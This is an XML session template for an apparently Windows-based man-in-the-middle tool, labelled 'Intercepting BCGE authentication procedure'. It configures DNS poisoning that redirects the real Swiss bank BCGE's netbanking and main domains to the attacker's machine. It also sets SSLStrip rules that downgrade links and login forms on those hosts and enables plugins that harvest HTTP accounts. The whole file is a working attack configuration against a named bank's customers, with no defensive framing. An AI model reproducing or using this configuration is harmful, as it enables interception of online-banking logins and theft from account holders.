	<SessionTemplate>
<Config name="authentication_BCGE" description="Intercepting BCGE authentication procedure">
</Config>


<Plugins>
<Plugin name="DNS Poisoning" dirname="DNSPoisoning">

<ArrayOfDNSPoisonRecord xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <DNSPoisonRecord>
    <HostName>netbanking.bcge.ch</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>
  <DNSPoisonRecord>
    <HostName>www.bcge.ch</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>
  <DNSPoisonRecord>
    <HostName>bcge.ch</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>
</ArrayOfDNSPoisonRecord>
</Plugin>


<Plugin name="DNS requests" dirname="DNSRequests">
</Plugin>

<Plugin name="HTTP accounts" dirname="HTTPAccounts">
</Plugin>

<Plugin name="HTTP requests" dirname="HTTPRequests">
  <ArrayOfHTTPRequests xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" />
</Plugin>


<Plugin name="SSLStrip" dirname="SSLStrip">

<ArrayOfSSLStripRecord xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <SSLStripRecord>
    <HostName>netbanking.bcge.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>a</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>netbanking.bcge.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>form</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>www.bcge.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>form</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>www.bcge.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>a</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>bcge.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>a</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>bcge.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>form</Tag>
  </SSLStripRecord>
</ArrayOfSSLStripRecord>
</Plugin>
<Plugin name="Systems" dirname="Systems">

</Plugin>

</Plugins>
</SessionTemplate>
